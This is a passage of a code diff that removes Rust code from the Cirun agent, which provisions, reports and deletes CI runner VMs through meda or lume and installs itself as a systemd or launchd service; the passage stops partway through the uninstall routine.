-// Helper function to determine if we should use meda (Linux host) or lume (macOS host)
-fn use_meda() -> bool {
-    env::consts::OS == "linux"
-}
-
-/// Get the count of currently running VMs
-async fn get_running_vm_count() -> Result<usize, Box<dyn std::error::Error>> {
-    if use_meda() {
-        let meda = MedaClient::new()?;
-        let vms = meda.list_vms().await?;
-        Ok(vms.iter().filter(|vm| vm.state == "running").count())
-    } else {
-        let lume = LumeClient::new()?;
-        let vms = lume.list_vms().await?;
-        Ok(vms.iter().filter(|vm| vm.state == "running").count())
-    }
-}
-
-/// Result of a single runner provisioning attempt
-struct ProvisionResult {
-    runner_name: String,
-    outcome: Result<(), String>,
-}
-
-/// Provision a single runner in its own task (standalone, no &self needed).
-/// Acquires a semaphore permit to enforce concurrency bounds.
-async fn provision_single_runner(
-    runner: RunnerToProvision,
-    semaphore: Arc<Semaphore>,
-) -> ProvisionResult {
-    let _permit = semaphore.acquire().await.expect("semaphore closed");
-
-    info!(
-        "Processing runner: {} (image: {}, os: {}, cpu: {}, mem: {}GB, disk: {}GB)",
-        runner.name, runner.image, runner.os, runner.cpu, runner.memory, runner.disk
-    );
-
-    // Parse registry from image name
-    let (registry, image) =
-        if runner.image.contains('.') && runner.image.split('/').next().unwrap().contains('.') {
-            let parts: Vec<&str> = runner.image.splitn(2, '/').collect();
-            if parts.len() == 2 {
-                (Some(parts[0].to_string()), parts[1].to_string())
-            } else {
-                (Some("ghcr.io".to_string()), runner.image.clone())
-            }
-        } else {
-            (Some("ghcr.io".to_string()), runner.image.clone())
-        };
-
-    let template_config = TemplateConfig {
-        image,
-        registry,
-        organization: None,
-        cpu: runner.cpu,
-        memory: runner.memory,
-        disk: runner.disk,
-        os: runner.os.clone(),
-    };
-
-    // Resolve template: meda uses image directly, lume uses template matching
-    let template_name = if use_meda() {
-        info!(
-            "Using meda on Linux - using image name directly: {}",
-            runner.image
-        );
-        Some(runner.image.clone())
-    } else if let Some(existing_template) = find_matching_template(&template_config).await {
-        info!(
-            "Found existing template with matching configuration: {}",
-            existing_template
-        );
-        Some(existing_template)
-    } else {
-        let generated_name = generate_template_name(&template_config);
-        let template_exists = check_template_exists(&generated_name).await;
-
-        if !template_exists {
-            info!(
-                "No matching template found. Creating new template '{}' from image '{}'",
-                generated_name, template_config.image
-            );
-            match create_template(&template_config, &generated_name).await {
-                Ok(_) => {
-                    info!("Successfully created template: {}", generated_name);
-                    Some(generated_name)
-                }
-                Err(e) => {
-                    error!("Failed to create template {}: {}", generated_name, e);
-                    return ProvisionResult {
-                        runner_name: runner.name.clone(),
-                        outcome: Err(format!("Template creation failed: {}", e)),
-                    };
-                }
-            }
-        } else {
-            info!("Using existing template: {}", generated_name);
-            Some(generated_name)
-        }
-    };
-
-    let template_name = match template_name {
-        Some(t) => t,
-        None => {
-            return ProvisionResult {
-                runner_name: runner.name.clone(),
-                outcome: Err("No template available".to_string()),
-            };
-        }
-    };
-
-    info!(
-        "Provisioning runner '{}' with template '{}'",
-        runner.name, template_name
-    );
-
-    let resources = RunnerResources {
-        cpu: runner.cpu,
-        memory: runner.memory,
-        disk: runner.disk,
-    };
-
-    // Dispatch to meda or lume provisioning
-    let result = if use_meda() {
-        do_provision_meda(
-            &runner.name,
-            &runner.provision_script,
-            &template_name,
-            &runner.login,
-            &resources,
-        )
-        .await
-    } else {
-        do_provision_lume(
-            &runner.name,
-            &runner.provision_script,
-            &template_name,
-            &runner.login,
-        )
-        .await
-    };
-
-    match result {
-        Ok(()) => {
-            info!(
-                "Successfully provisioned runner: {} using template {}",
-                runner.name, template_name
-            );
-            ProvisionResult {
-                runner_name: runner.name.clone(),
-                outcome: Ok(()),
-            }
-        }
-        Err(e) => {
-            let error_msg = e.to_string();
-            error!(
-                "Failed to provision runner {} using template {}: {}",
-                runner.name, template_name, error_msg
-            );
-            ProvisionResult {
-                runner_name: runner.name.clone(),
-                outcome: Err(error_msg),
-            }
-        }
-    }
-}
-
-/// Free-function version of meda provisioning (no &self needed)
-async fn do_provision_meda(
-    runner_name: &str,
-    provision_script: &str,
-    image: &str,
-    runner_login: &RunnerLogin,
-    resources: &RunnerResources,
-) -> Result<(), String> {
-    use crate::meda::models::VmRunRequest;
-
-    let meda = MedaClient::new().map_err(|e| format!("Failed to initialize Meda client: {e}"))?;
-
-    match meda.get_vm(runner_name).await {
-        Ok(vm_info) => {
-            if vm_info.state == "running" {
-                info!(
-                    "VM '{}' already exists and is running. Skipping creation.",
-                    runner_name
-                );
-            } else {
-                info!(
-                    "VM '{}' exists but is not running. Starting it...",
-                    runner_name
-                );
-                meda.start_vm(runner_name)
-                    .await
-                    .map_err(|e| format!("Failed to start VM '{}': {e}", runner_name))?;
-            }
-        }
-        Err(_) => {
-            info!(
-                "VM '{}' does not exist. Creating from image '{}'...",
-                runner_name, image
-            );
-            let run_request = VmRunRequest {
-                image: image.to_string(),
-                name: Some(runner_name.to_string()),
-                memory: Some(format!("{}G", resources.memory)),
-                cpus: Some(resources.cpu),
-                disk_size: Some(format!("{}G", resources.disk)),
-            };
-
-            if let Err(err_msg) = meda.run_vm(run_request).await.map_err(|e| {
-                format!(
-                    "Failed to create and run VM from image '{}': {:?}",
-                    image, e
-                )
-            }) {
-                error!("{}", err_msg);
-                let _ = CirunClient::cleanup_failed_runner(runner_name).await;
-                return Err(err_msg);
-            }
-            info!("VM '{}' created and started successfully", runner_name);
-        }
-    }
-
-    info!("Waiting for VM '{}' to get an IP address...", runner_name);
-    let ip_address = match meda
-        .wait_for_vm_ip(runner_name, 300)
-        .await
-        .map_err(|e| format!("Failed to get VM IP address: {:?}", e))
-    {
-        Ok(ip) => ip,
-        Err(err_msg) => {
-            error!("{}", err_msg);
-            let _ = CirunClient::cleanup_failed_runner(runner_name).await;
-            return Err(err_msg);
-        }
-    };
-
-    info!("VM '{}' has IP address: {}", runner_name, ip_address);
-    info!("Provisioning runner: {}", runner_name);
-
-    match run_script_on_vm_meda(
-        &meda,
-        runner_name,
-        &ip_address,
-        provision_script,
-        runner_login,
-        true,
-    )
-    .await
-    .map_err(|e| format!("Failed to provision runner: {}", e))
-    {
-        Ok(output) => {
-            info!("Runner provisioning completed successfully");
-            info!("Script output: {}", output);
-            Ok(())
-        }
-        Err(err_msg) => {
-            error!("{}", err_msg);
-            let _ = CirunClient::cleanup_failed_runner(runner_name).await;
-            Err(err_msg)
-        }
-    }
-}
-
-/// Free-function version of lume provisioning (no &self needed)
-async fn do_provision_lume(
-    runner_name: &str,
-    provision_script: &str,
-    template_name: &str,
-    runner_login: &RunnerLogin,
-) -> Result<(), String> {
-    let lume = LumeClient::new().map_err(|e| format!("Failed to initialize Lume client: {e}"))?;
-
-    let vm_result = lume.get_vm(runner_name).await;
-    let vm_exists = vm_result.is_ok();
-
-    let vm = if vm_exists {
-        vm_result.unwrap()
-    } else {
-        info!(
-            "VM '{}' does not exist. Attempting to clone from template '{}'...",
-            runner_name, template_name
-        );
-
-        let template_check = lume.get_vm(template_name).await.map_err(|e| {
-            format!(
-                "Template '{}' not found: {:?}. Cannot provision runner.",
-                template_name, e
-            )
-        });
-        template_check?;
-
-        let clone_result = lume
-            .clone_vm(template_name, runner_name)
-            .await
-            .map_err(|e| {
-                format!(
-                    "Failed to clone VM from template '{}': {:?}",
-                    template_name, e
-                )
-            });
-        match clone_result {
-            Ok(_) => {
-                info!(
-                    "VM '{}' cloned successfully from template '{}'",
-                    runner_name, template_name
-                );
-                lume.get_vm(runner_name)
-                    .await
-                    .map_err(|e| format!("Failed to get VM after clone: {:?}", e))?
-            }
-            Err(err_msg) => {
-                error!("{}", err_msg);
-                let _ = CirunClient::cleanup_failed_runner(runner_name).await;
-                return Err(err_msg);
-            }
-        }
-    };
-
-    info!("VM '{}' is now available", runner_name);
-
-    if vm.state != "stopped" {
-        info!(
-            "VM '{}' exists and is not stopped. Skipping provisioning.",
-            runner_name
-        );
-        return Ok(());
-    }
-
-    let username = runner_login.username.clone();
-    let password = runner_login.password.clone();
-
-    info!("Provisioning runner: {}", runner_name);
-
-    match run_script_on_vm(
-        &lume,
-        runner_name,
-        provision_script,
-        &username,
-        &password,
-        20,
-        true,
-    )
-    .await
-    .map_err(|e| format!("Failed to provision runner: {}", e))
-    {
-        Ok(output) => {
-            info!("Runner provisioning completed successfully");
-            info!("Script output: {}", output);
-            Ok(())
-        }
-        Err(err_msg) => {
-            error!("{}", err_msg);
-            let _ = CirunClient::cleanup_failed_runner(runner_name).await;
-            Err(err_msg)
-        }
-    }
-}
-
-// Get system hostname
-fn get_hostname() -> String {
-    if let Ok(hostname) = env::var("HOSTNAME") {
-        return hostname;
-    }
-
-    if let Ok(output) = StdCommand::new("hostname").output() {
-        if let Ok(hostname) = String::from_utf8(output.stdout) {
-            return hostname.trim().to_string();
-        }
-    }
-
-    "unknown-host".to_string()
-}
-
-// Generate or retrieve a persistent agent information
-fn check_sshpass_installed() -> bool {
-    match StdCommand::new("which").arg("sshpass").output() {
-        Ok(output) => {
-            if output.status.success() {
-                info!("✅ sshpass is installed");
-                true
-            } else {
-                error!("❌ sshpass is not installed");
-                error!("VM provisioning requires sshpass for SSH authentication");
-                error!("Install it using: brew install sshpass");
-                false
-            }
-        }
-        Err(e) => {
-            warn!("Failed to check for sshpass: {}", e);
-            false
-        }
-    }
-}
-
-fn get_agent_info(id_file: &str) -> AgentInfo {
-    let id = if Path::new(id_file).exists() {
-        match fs::read_to_string(id_file) {
-            Ok(id) => {
-                let id = id.trim().to_string();
-                info!("Using existing agent ID: {}", id);
-                id
-            }
-            Err(e) => {
-                error!("Failed to read agent ID file: {}", e);
-                // Generate a new UUID v4
-                let new_id = Uuid::new_v4().to_string();
-                info!("Generated new agent ID: {}", new_id);
-
-                // Save the ID to file for persistence
-                if let Err(e) = fs::write(id_file, &new_id) {
-                    error!("Failed to write agent ID to file: {}", e);
-                }
-
-                new_id
-            }
-        }
-    } else {
-        // Generate a new UUID v4
-        let new_id = Uuid::new_v4().to_string();
-        info!("Generated new agent ID: {}", new_id);
-
-        // Save the ID to file for persistence
-        if let Err(e) = fs::write(id_file, &new_id) {
-            error!("Failed to write agent ID to file: {}", e);
-        }
-
-        new_id
-    };
-
-    AgentInfo {
-        id,
-        hostname: get_hostname(),
-        os: env::consts::OS.to_string(),
-        arch: env::consts::ARCH.to_string(),
-    }
-}
-
-// Client for interacting with the CiRun API
-struct CirunClient {
-    client: Client,
-    base_url: String,
-    api_token: String,
-    agent: AgentInfo,
-    retry_tracker: HashMap<String, u32>,
-    /// None means no limit, Some(n) means max n concurrent VMs
-    max_vms: Option<u32>,
-}
-
-impl CirunClient {
-    fn new(base_url: &str, api_token: &str, agent: AgentInfo, max_vms: Option<u32>) -> Self {
-        let client = Client::builder()
-            .timeout(Duration::from_secs(15))
-            .connect_timeout(Duration::from_secs(10))
-            .build()
-            .expect("Failed to build HTTP client");
-
-        CirunClient {
-            client,
-            base_url: base_url.to_string(),
-            api_token: api_token.to_string(),
-            agent,
-            retry_tracker: HashMap::new(),
-            max_vms,
-        }
-    }
-
-    // Helper method to create a request builder with common headers
-    fn create_request(&self, method: reqwest::Method, url: &str) -> reqwest::RequestBuilder {
-        let request_id = Uuid::new_v4().to_string();
-        info!("Creating request with ID: {}", request_id);
-
-        self.client
-            .request(method, url)
-            .header("Authorization", format!("Bearer {}", self.api_token))
-            .header("X-Request-ID", request_id)
-            .header("X-Agent-ID", &self.agent.id)
-    }
-
-    async fn handle_orphaned_runners(&self, response: reqwest::Response) {
-        // Parse response for runners_to_delete (orphaned VMs)
-        match response.json::<ApiResponse>().await {
-            Ok(api_response) => {
-                if !api_response.runners_to_delete.is_empty() {
-                    info!(
-                        "API returned {} orphaned runners to delete from POST",
-                        api_response.runners_to_delete.len()
-                    );
-                    for runner in &api_response.runners_to_delete {
-                        match self.delete_runner(&runner.name).await {
-                            Ok(_) => {
-                                info!("✅ Successfully deleted orphaned runner: {}", runner.name);
-                            }
-                            Err(e) => {
-                                error!("❌ Failed to delete orphaned runner {}: {}", runner.name, e)
-                            }
-                        }
-                    }
-                }
-            }
-            Err(e) => {
-                info!(
-                    "No runners_to_delete in POST response or parse error: {}",
-                    e
-                );
-            }
-        }
-    }
-
-    async fn report_running_vms(&self) {
-        info!("Reporting running VMs to API");
-
-        if use_meda() {
-            // Use meda for Linux
-            // Check if meda is running, restart if needed
-            if !meda::setup::is_meda_running() {
-                warn!("Meda process is not running. Restarting...");
-                meda::download_and_run_meda().await;
-            }
-
-            match MedaClient::new() {
-                Ok(meda) => {
-                    match meda.list_vms().await {
-                        Ok(vms) => {
-                            // Report all cirun VMs (running or stopped) so API can sync deletion state
-                            let cirun_vms: Vec<_> = vms
-                                .into_iter()
-                                .filter(|vm| vm.name.starts_with("cirun-"))
-                                .collect();
-                            let url = format!("{}/agent", self.base_url);
-
-                            let res = self
-                                .create_request(reqwest::Method::POST, &url)
-                                .json(&json!({
-                                    "agent": self.agent,
-                                    "vms": cirun_vms.iter().map(|vm| {
-                                        json!({
-                                            "name": vm.name,
-                                            "os": "linux",
-                                            "cpu": vm.cpus.unwrap_or(2),
-                                            "memory": vm.memory.as_ref().and_then(|m| m.trim_end_matches("GB").trim_end_matches("G").parse::<u64>().ok()).unwrap_or(2048),
-                                            "disk_size": 0  // Meda doesn't report disk size in list
-                                        })
-                                    }).collect::<Vec<_>>()
-                                }))
-                                .send()
-                                .await;
-
-                            match res {
-                                Ok(response) => {
-                                    let status = response.status();
-                                    info!("API response status: {}", status);
-                                    if let Some(req_id) = response.headers().get("X-Request-ID") {
-                                        if let Ok(id) = req_id.to_str() {
-                                            info!("Response received with request ID: {}", id);
-                                        }
-                                    }
-                                    self.handle_orphaned_runners(response).await;
-                                }
-                                Err(e) => error!("Failed to send running VMs: {}", e),
-                            }
-                        }
-                        Err(e) => error!("Failed to list VMs: {:?}", e),
-                    }
-                }
-                Err(e) => error!("Failed to initialize Meda client: {:?}", e),
-            }
-        } else {
-            // Use lume for macOS
-            // Check if lume is running, restart if needed
-            if !lume::setup::is_lume_running() {
-                warn!("Lume process is not running. Restarting...");
-                lume::download_and_run_lume().await;
-            }
-
-            match LumeClient::new() {
-                Ok(lume) => {
-                    match lume.list_vms().await {
-                        Ok(vms) => {
-                            // Report all cirun VMs (running or stopped) so API can sync deletion state
-                            let cirun_vms: Vec<_> = vms
-                                .into_iter()
-                                .filter(|vm| vm.name.starts_with("cirun-"))
-                                .collect();
-                            let url = format!("{}/agent", self.base_url);
-
-                            // Use the helper method instead of direct client access
-                            let res = self
-                                .create_request(reqwest::Method::POST, &url)
-                                .json(&json!({
-                                    "agent": self.agent,
-                                    "vms": cirun_vms.iter().map(|vm| {
-                                        json!({
-                                            "name": vm.name,
-                                            "os": vm.os,
-                                            "cpu": vm.cpu,
-                                            "memory": vm.memory,
-                                            "disk_size": vm.disk_size.total
-                                        })
-                                    }).collect::<Vec<_>>()
-                                }))
-                                .send()
-                                .await;
-
-                            match res {
-                                Ok(response) => {
-                                    let status = response.status();
-                                    info!("API response status: {}", status);
-                                    if let Some(req_id) = response.headers().get("X-Request-ID") {
-                                        if let Ok(id) = req_id.to_str() {
-                                            info!("Response received with request ID: {}", id);
-                                        }
-                                    }
-                                    self.handle_orphaned_runners(response).await;
-                                }
-                                Err(e) => error!("Failed to send running VMs: {}", e),
-                            }
-                        }
-                        Err(e) => error!("Failed to list VMs: {:?}", e),
-                    }
-                }
-                Err(e) => error!("Failed to initialize Lume client: {:?}", e),
-            }
-        }
-    }
-
-    /// Helper function to cleanup a failed runner VM
-    async fn cleanup_failed_runner(runner_name: &str) -> Result<(), Box<dyn std::error::Error>> {
-        info!("Cleaning up failed runner: {}", runner_name);
-
-        if use_meda() {
-            match MedaClient::new() {
-                Ok(meda) => match meda.delete_vm(runner_name).await {
-                    Ok(_) => {
-                        info!("Successfully deleted failed runner VM: {}", runner_name);
-                        Ok(())
-                    }
-                    Err(e) => {
-                        error!("Failed to delete runner VM {}: {:?}", runner_name, e);
-                        Err(e.into())
-                    }
-                },
-                Err(e) => {
-                    error!("Failed to initialize Meda client for cleanup: {:?}", e);
-                    Err(e.into())
-                }
-            }
-        } else {
-            match LumeClient::new() {
-                Ok(lume) => match lume.delete_vm(runner_name).await {
-                    Ok(_) => {
-                        info!("Successfully deleted failed runner VM: {}", runner_name);
-                        Ok(())
-                    }
-                    Err(e) => {
-                        error!("Failed to delete runner VM {}: {:?}", runner_name, e);
-                        Err(e.into())
-                    }
-                },
-                Err(e) => {
-                    error!("Failed to initialize Lume client for cleanup: {:?}", e);
-                    Err(e.into())
-                }
-            }
-        }
-    }
-
-    async fn delete_runner(&self, runner_name: &str) -> Result<(), Box<dyn std::error::Error>> {
-        if use_meda() {
-            match MedaClient::new() {
-                Ok(meda) => {
-                    info!("Attempting to delete runner VM: {}", runner_name);
-                    match meda.get_vm(runner_name).await {
-                        Ok(_) => match meda.delete_vm(runner_name).await {
-                            Ok(_) => {
-                                info!("Successfully deleted runner VM: {}", runner_name);
-                                Ok(())
-                            }
-                            Err(e) => {
-                                error!("Failed to delete runner VM {}: {:?}", runner_name, e);
-                                Err(format!("Failed to delete VM: {:?}", e).into())
-                            }
-                        },
-                        Err(e) => {
-                            warn!(
-                                "VM '{}' not found or error retrieving VM details: {:?}",
-                                runner_name, e
-                            );
-                            info!("VM '{}' doesn't exist or can't be accessed - considering delete successful", runner_name);
-                            Ok(())
-                        }
-                    }
-                }
-                Err(e) => {
-                    error!("Failed to initialize Meda client: {:?}", e);
-                    Err(e.into())
-                }
-            }
-        } else {
-            match LumeClient::new() {
-                Ok(lume) => {
-                    info!("Attempting to delete runner VM: {}", runner_name);
-
-                    // Check if VM exists by trying to get its details
-                    match lume.get_vm(runner_name).await {
-                        Ok(vm) => {
-                            info!("Found VM '{}' with status: {}", runner_name, vm.state);
-
-                            // Delete the VM
-                            match lume.delete_vm(runner_name).await {
-                                Ok(_) => {
-                                    info!("VM '{}' deleted successfully", runner_name);
-                                    Ok(())
-                                }
-                                Err(e) => {
-                                    error!("Failed to delete VM '{}': {:?}", runner_name, e);
-                                    Err(format!("Failed to delete VM '{}': {:?}", runner_name, e)
-                                        .into())
-                                }
-                            }
-                        }
-                        Err(e) => {
-                            warn!(
-                                "VM '{}' not found or error retrieving VM details: {:?}",
-                                runner_name, e
-                            );
-                            // Consider this a success since the VM doesn't exist anyway
-                            info!("VM '{}' doesn't exist or can't be accessed - considering delete successful", runner_name);
-                            Ok(())
-                        }
-                    }
-                }
-                Err(e) => {
-                    error!("Failed to initialize Lume client: {:?}", e);
-                    Err(e.into())
-                }
-            }
-        }
-    }
-
-    /// Get the current retry count for a runner
-    fn get_retry_count(&self, runner_name: &str) -> u32 {
-        *self.retry_tracker.get(runner_name).unwrap_or(&0)
-    }
-
-    /// Increment the retry count for a runner and return the new count
-    fn increment_retry(&mut self, runner_name: &str) -> u32 {
-        let count = self
-            .retry_tracker
-            .entry(runner_name.to_string())
-            .or_insert(0);
-        *count += 1;
-        *count
-    }
-
-    /// Clear the retry count for a runner
-    fn clear_retry(&mut self, runner_name: &str) {
-        self.retry_tracker.remove(runner_name);
-    }
-
-    /// Check if a runner should be retried based on max_retries
-    fn should_retry(&self, runner_name: &str, max_retries: u32) -> bool {
-        self.get_retry_count(runner_name) < max_retries
-    }
-
-    /// Notify the API that a runner provisioning attempt failed
-    async fn notify_provision_failure(&self, runner_name: &str, error: String, attempt: u32) {
-        let url = format!("{}/agent", self.base_url);
-
-        info!(
-            "Notifying API of provisioning failure for {} (attempt {})",
-            runner_name, attempt
-        );
-
-        let request_data = json!({
-            "agent": self.agent,
-            "provision_failure": {
-                "runner_name": runner_name,
-                "error": error,
-                "attempt": attempt,
-            }
-        });
-
-        match self
-            .create_request(reqwest::Method::POST, &url)
-            .json(&request_data)
-            .send()
-            .await
-        {
-            Ok(response) => {
-                if response.status().is_success() {
-                    debug!("Successfully notified API of provisioning failure");
-                } else {
-                    warn!(
-                        "API returned non-success status for failure notification: {}",
-                        response.status()
-                    );
-                }
-            }
-            Err(e) => {
-                warn!("Failed to notify API of provisioning failure: {}", e);
-            }
-        }
-    }
-
-    async fn manage_runner_lifecycle(
-        &mut self,
-        provision_set: &mut JoinSet<ProvisionResult>,
-        in_flight: &mut std::collections::HashSet<String>,
-    ) -> Result<ApiResponse, Error> {
-        let url = format!("{}/agent", self.base_url);
-        info!("Fetching runner provision/deletion data from: {}", url);
-
-        let request_data = json!({
-            "agent": self.agent,
-        });
-
-        // Use the helper method instead of direct client access
-        let response = self
-            .create_request(reqwest::Method::GET, &url)
-            .json(&request_data)
-            .send()
-            .await?;
-
-        info!("Response status: {}", response.status());
-        let json: ApiResponse = response.json().await?;
-
-        // Handle any runners that need deletion
-        if !json.runners_to_delete.is_empty() {
-            info!(
-                "Received {} runners to delete",
-                json.runners_to_delete.len()
-            );
-
-            for runner in &json.runners_to_delete {
-                match self.delete_runner(&runner.name).await {
-                    Ok(_) => {
-                        info!("✅ Successfully deleted runner: {}", runner.name);
-                        self.report_running_vms().await;
-                    }
-
-                    Err(e) => error!("❌ Failed to delete runner {}: {}", runner.name, e),
-                }
-            }
-        }
-
-        // Handle runners that need provisioning
-        if !json.runners_to_provision.is_empty() {
-            info!(
-                "Received {} runners to provision",
-                json.runners_to_provision.len()
-            );
-
-            // First, handle retry-exhausted runners (notify API, skip them)
-            for runner in &json.runners_to_provision {
-                let current_attempts = self.get_retry_count(&runner.name);
-                if !self.should_retry(&runner.name, runner.max_retries) {
-                    warn!(
-                        "Runner '{}' has exceeded max retries ({}/{}). Skipping provisioning.",
-                        runner.name, current_attempts, runner.max_retries
-                    );
-                    self.notify_provision_failure(
-                        &runner.name,
-                        format!("Exceeded max retries ({})", runner.max_retries),
-                        current_attempts,
-                    )
-                    .await;
-                }
-            }
-
-            // Collect eligible runners (not retry-exhausted, not already in-flight)
-            let eligible_runners: Vec<RunnerToProvision> = json
-                .runners_to_provision
-                .iter()
-                .filter(|r| self.should_retry(&r.name, r.max_retries))
-                .filter(|r| {
-                    if in_flight.contains(&r.name) {
-                        info!("Skipping runner '{}' — already in-flight", r.name);
-                        false
-                    } else {
-                        true
-                    }
-                })
-                .cloned()
-                .collect();
-
-            if !eligible_runners.is_empty() {
-                // Calculate available slots based on VM capacity
-                let available_slots = if let Some(max_vms) = self.max_vms {
-                    match get_running_vm_count().await {
-                        Ok(running_count) => {
-                            let slots = (max_vms as usize).saturating_sub(running_count);
-                            info!(
-                                "VM capacity: {}/{} running, {} slots available, {} runners requested",
-                                running_count, max_vms, slots, eligible_runners.len()
-                            );
-                            if slots == 0 {
-                                info!("No VM slots available. Runners will be picked up on next poll.");
-                            }
-                            slots
-                        }
-                        Err(e) => {
-                            warn!(
-                                "Failed to check VM capacity: {}. Using runner count as limit.",
-                                e
-                            );
-                            eligible_runners.len()
-                        }
-                    }
-                } else {
-                    eligible_runners.len()
-                };
-
-                if available_slots > 0 {
-                    // Cap runners to available slots
-                    let runners_to_spawn: Vec<RunnerToProvision> =
-                        eligible_runners.into_iter().take(available_slots).collect();
-
-                    info!(
-                        "Spawning {} runners in parallel (max concurrency: {})",
-                        runners_to_spawn.len(),
-                        available_slots
-                    );
-
-                    let semaphore = Arc::new(Semaphore::new(available_slots));
-
-                    for runner in runners_to_spawn {
-                        in_flight.insert(runner.name.clone());
-                        let sem = semaphore.clone();
-                        provision_set.spawn(provision_single_runner(runner, sem));
-                    }
-
-                    info!(
-                        "Spawned provisioning tasks. Total in-flight: {}",
-                        provision_set.len()
-                    );
-                }
-            }
-        }
-
-        Ok(json)
-    }
-}
-
-fn install_service(args: &Args) {
-    use std::fs;
-
-    println!("Installing cirun-agent as a system service...");
-
-    // Get the current executable path
-    let exe_path = std::env::current_exe().expect("Failed to get current executable path");
-    let exe_path_str = exe_path.to_str().expect("Failed to convert path to string");
-
-    // Build the command line
-    let api_token = args
-        .api_token
-        .as_ref()
-        .expect("API token is required for service installation");
-    let mut cmd = format!("{} --api-token {}", exe_path_str, api_token);
-    if args.interval != 5 {
-        cmd.push_str(&format!(" --interval {}", args.interval));
-    }
-    if args.verbose {
-        cmd.push_str(" --verbose");
-    }
-
-    if cfg!(target_os = "linux") {
-        // Check if service already exists and stop it first
-        let service_path = "/etc/systemd/system/cirun-agent.service";
-        if std::path::Path::new(service_path).exists() {
-            println!("Found existing cirun-agent service, stopping it...");
-            let _ = std::process::Command::new("systemctl")
-                .args(["stop", "cirun-agent"])
-                .status();
-            let _ = std::process::Command::new("systemctl")
-                .args(["disable", "cirun-agent"])
-                .status();
-        }
-
-        // Create systemd service file
-        // Get the home directory for the service
-        let home_dir = std::env::var("HOME").unwrap_or_else(|_| "/root".to_string());
-
-        let service_content = format!(
-            r#"[Unit]
-Description=Cirun Agent for On-Prem Runner Management
-After=network.target
-
-[Service]
-Type=simple
-ExecStart={}
-Environment="HOME={}"
-Restart=always
-RestartSec=10
-StandardOutput=journal
-StandardError=journal
-
-[Install]
-WantedBy=multi-user.target
-"#,
-            cmd, home_dir
-        );
-
-        let service_path = "/etc/systemd/system/cirun-agent.service";
-        fs::write(service_path, service_content).expect("Failed to write systemd service file");
-        println!("✅ Created systemd service file at {}", service_path);
-
-        // Reload systemd and enable service
-        std::process::Command::new("systemctl")
-            .args(["daemon-reload"])
-            .status()
-            .expect("Failed to reload systemd");
-        println!("✅ Reloaded systemd");
-
-        std::process::Command::new("systemctl")
-            .args(["enable", "cirun-agent"])
-            .status()
-            .expect("Failed to enable cirun-agent service");
-        println!("✅ Enabled cirun-agent to start on boot");
-
-        std::process::Command::new("systemctl")
-            .args(["start", "cirun-agent"])
-            .status()
-            .expect("Failed to start cirun-agent service");
-        println!("✅ Started cirun-agent service");
-
-        println!("\nService installed successfully!");
-        println!("View logs: journalctl -u cirun-agent -f");
-        println!("Stop service: sudo systemctl stop cirun-agent");
-        println!("Restart service: sudo systemctl restart cirun-agent");
-    } else if cfg!(target_os = "macos") {
-        // Create launchd plist
-        let home_dir = std::env::var("HOME").expect("Failed to get HOME directory");
-        let plist_dir = format!("{}/Library/LaunchAgents", home_dir);
-        let plist_path = format!("{}/io.cirun.agent.plist", plist_dir);
-
-        // Check if service already exists and unload it first
-        if std::path::Path::new(&plist_path).exists() {
-            println!("Found existing cirun-agent service, unloading it...");
-            let _ = std::process::Command::new("launchctl")
-                .args(["unload", &plist_path])
-                .status();
-        }
-
-        fs::create_dir_all(&plist_dir).expect("Failed to create LaunchAgents directory");
-
-        let plist_content = format!(
-            r#"<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-    <key>Label</key>
-    <string>io.cirun.agent</string>
-    <key>ProgramArguments</key>
-    <array>
-        <string>{}</string>
-        <string>--api-token</string>
-        <string>{}</string>
-        <string>--interval</string>
-        <string>{}</string>
-{}    </array>
-    <key>EnvironmentVariables</key>
-    <dict>
-        <key>PATH</key>
-        <string>/opt/homebrew/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
-    </dict>
-    <key>RunAtLoad</key>
-    <true/>
-    <key>KeepAlive</key>
-    <true/>
-    <key>StandardOutPath</key>
-    <string>{}/Library/Logs/cirun-agent.log</string>
-    <key>StandardErrorPath</key>
-    <string>{}/Library/Logs/cirun-agent.error.log</string>
-</dict>
-</plist>
-"#,
-            exe_path_str,
-            api_token,
-            args.interval,
-            if args.verbose {
-                "        <string>--verbose</string>\n"
-            } else {
-                ""
-            },
-            home_dir,
-            home_dir
-        );
-
-        fs::write(&plist_path, plist_content).expect("Failed to write launchd plist");
-        println!("✅ Created launchd plist at {}", plist_path);
-
-        // Load the service
-        std::process::Command::new("launchctl")
-            .args(["load", &plist_path])
-            .status()
-            .expect("Failed to load launchd service");
-        println!("✅ Loaded cirun-agent service");
-
-        println!("\nService installed successfully!");
-        println!("View logs: tail -f ~/Library/Logs/cirun-agent.log");
-        println!("Stop service: launchctl unload {}", plist_path);
-        println!(
-            "Restart service: launchctl unload {} && launchctl load {}",
-            plist_path, plist_path
-        );
-    } else {
-        eprintln!("Unsupported operating system");
-        std::process::exit(1);
-    }
-}
-
-fn uninstall_service() {
-    println!("Uninstalling cirun-agent system service...");
-
-    if cfg!(target_os = "linux") {
-        let service_path = "/etc/systemd/system/cirun-agent.service";
-
-        // Check if service exists
-        if !std::path::Path::new(service_path).exists() {
-            println!("[ERROR] Service is not installed");
-            std::process::exit(1);
-        }
-
-        // Stop the service
-        println!("Stopping cirun-agent service...");
-        let _ = std::process::Command::new("systemctl")
-            .args(["stop", "cirun-agent"])
-            .status();
-        println!("[OK] Stopped cirun-agent service");
-
-        // Disable the service
-        println!("Disabling cirun-agent service...");
-        let _ = std::process::Command::new("systemctl")
-            .args(["disable", "cirun-agent"])
-            .status();
-        println!("[OK] Disabled cirun-agent service");
-
-        // Remove the service file
-        if let Err(e) = std::fs::remove_file(service_path) {
-            eprintln!("[ERROR] Failed to remove service file: {}", e);
-            std::process::exit(1);
-        }
-        println!("[OK] Removed service file: {}", service_path);
-
-        // Reload systemd
-        std::process::Command::new("systemctl")
-            .args(["daemon-reload"])
-            .status()
-            .expect("Failed to reload systemd");
-        println!("[OK] Reloaded systemd");
-
-        println!("\n[OK] Service uninstalled successfully!");
-    } else if cfg!(target_os = "macos") {
-        let home_dir = std::env::var("HOME").expect("Failed to get HOME directory");
-        let plist_path = format!("{}/Library/LaunchAgents/io.cirun.agent.plist", home_dir);
-
-        // Check if service exists
-        if !std::path::Path::new(&plist_path).exists() {
-            println!("[ERROR] Service is not installed");
-            std::process::exit(1);
-        }
-
-        // Unload the service
-        println!("Unloading cirun-agent service...");
-        match std::process::Command::new("launchctl")
